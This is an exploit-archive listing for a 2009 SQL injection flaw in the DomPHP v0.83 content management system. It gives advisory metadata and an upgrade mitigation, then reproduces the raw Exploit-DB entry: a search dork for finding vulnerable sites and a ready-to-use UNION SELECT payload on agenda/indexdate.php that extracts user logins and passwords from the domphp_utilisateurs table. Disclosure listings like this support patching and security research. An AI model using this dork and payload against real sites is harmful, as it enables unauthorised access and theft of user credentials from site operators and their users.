DomPHP - exploit.company

vendor:

DomPHP

by:

Houssamix

8,8

CVSS

HIGH

SQL Injection Vulnerability

CWE

Product Name: DomPHP

Affected Version From: v0.83

Affected Version To: v0.83

Patch Exists: YES

Related CWE: N/A

CPE: a:domphp:domphp:0.83

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

DomPHP <= v0.83 SQL Injection Vulnerability

A SQL injection vulnerability exists in DomPHP <= v0.83. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. This can allow the attacker to gain access to sensitive information such as usernames and passwords.

Mitigation:

Upgrade to the latest version of DomPHP

Source

Exploit-DB raw data:

-------------------------------------------------------------
DomPHP <= v0.83 SQL Injection Vulnerability 
-------------------------------------------------------------
 
= Author : Houssamix                       
= Script : DomPHP <= v0.83
                    
= Download : http://www.domphp.com/download/  
            
= BUG :  SQL Injection Vulnerability 
 
= DORK : Site créé à l'aide du CMS DomPHP v0.83 
 
= Exploit :                               
http://[target]/agenda/indexdate.php?ids=77 [SQL]
                 
Exemple : 				 

http://site.com/domphp/agenda/indexdate.php?ids=77 UNION SELECT 1,2,3,loginUtilisateur,5,6,passUtilisateur,8,9,10,11,12,13,14,15 from domphp_utilisateurs--